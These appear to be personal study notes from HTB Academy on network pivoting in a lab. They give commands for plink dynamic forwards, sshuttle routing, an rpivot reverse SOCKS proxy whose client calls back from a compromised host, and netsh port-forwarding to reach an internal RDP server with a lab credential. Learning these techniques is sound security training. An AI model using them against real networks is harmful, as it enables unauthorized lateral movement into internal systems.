Pivoting around obstacles

Notes from HTB academy, and general trial and error

SSH for Windows: Plink.exe

  • is a Windows command-line SSH tool

  • can be used to create dynamic port forwards and SOCKS proxies

example

to start a dynamic port forward over the Ubuntu server (pivot point), starting a SSH session between the attacking host (Windows) and the pivot point (Ubuntu)

plink -ssh -D 9050 ubuntu@10.129.15.50

Proxifier

  • Another Windows based tool

  • can be used to start a SOCKS tunnel via the SSH session we have created

  • Proxifier creates a tunneled network for desktop client applications and allows it to operate through SOCKS and HTTPS proxy

SSH pivoting with sshuttle

  • written in python

  • removes the need to configure proxychains

  • only works for pivoting over SSH and does not offer other options for pivoting over HTTPS or TOR servers

example

sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23

  • -r: to connect to the remote machine with username and password

  • we also need to include network or IP we want to route through the pivot host, in our case this would be the internal subnet of 172.16.5.0/23

this example

  • sshuttle creates an entry within our iptables to redirect al traffic to the 172.16.5.0/23 network through our pivot host

Traffic routing through iptables Routes

we can run tools such as nmap for example

nmap -v -sV -p3389 172.16.5.19 -A -Pn

all of our traffic will be directed at the internal network without the use of proxychains

Web Server Pivoting with Rpivot

  • Rpivot is a reverse SOCKS proxy tool written in python for SOCKS tunneling

  • Rpivot binds a machine that resides within a coperate network to an external server and exposes the clients local port server-side

sudo git clone https://github.com/klsecservices/rpivot.git

example

  • we have a web server within the internal network (172.16.5.153), and we want to access the web server using the pivot point (ubuntu server) and rpivot proxy

Lets start our rpivot SOCKS proxy server in preperation to connect to opur client on the compromised Ubuntu server (pivot host) using the server.py 

sudo python2.7 /opt/rpivot/server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Lets transfer over rpivot onto the pivot host (ubuntu server)

sudo scp -r /opt/rpivot ubuntu@10.129.37.7:/home/ubuntu/

Now we can run the client.py from our pivot host to connect back to our server

python2.7 client.py --server-ip 10.10.14.121 --server-port 9999

  • we should see a connection establish within the server prompt

Now we will configure proxychains to pivot over our local host on 127.0.0.1:9050 on our local machine (us), which was initally started by the server.py

Now i did have a problem try to use firefox through proxychains but curl worked

proxychains curl -X GET http://172.16.5.135

Port Forwarding with Windows Netsh

  • Netsh is a Windows command-line tool that can help with the network configuration of a particular widows system

  • examples of what netsh can do is

  1. Finding routes

  2. Viewing the firewall configuration

  3. Adding proxies

  4. Creating Port Forwarding rules

example

We can see from the diagram, we have compromised the Windows10 User workstation (10.129.15.150)

  • Now we want a way to communicate with the Windows server within the 172.16.5.0/23 subnet how can we do this

  • we can use netsh.exe to forward all data received on a specific port say 8080 (10.129.15.150) to a remote host on a remote post 3389 (172.16.5.25), tthis can be performed by the following command on the pivot host (10.129.15.19)

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

  • interface portproxy add v4tov4: Adds a new IPv4-IPv4 port proxy entry.

  • listenport=8080:Specifies the port on which the proxy will listen for incoming commands (on our pivot host)

  • listenaddress=10.129.15.150: Specifies the IP address on which the proxy will listen for incoming connections

  • connectport=3389:specifies the port to which the proxy will forward the incoming connection

  • connectaddress=172.16.5.25:Specifies the IP address to which the proxy will forward the incoming connections

We can verify that our proxy has taken place by

netsh.exe interface portproxy show v4tov4

Now we should be able to rdp into the web server

xfreerdp /u:victor /p:pass@123 /v:10.129.42.198:9000

PreviousPivoting, Tunneling, and Port ForwardingNextBranching out our tunnels

Last updated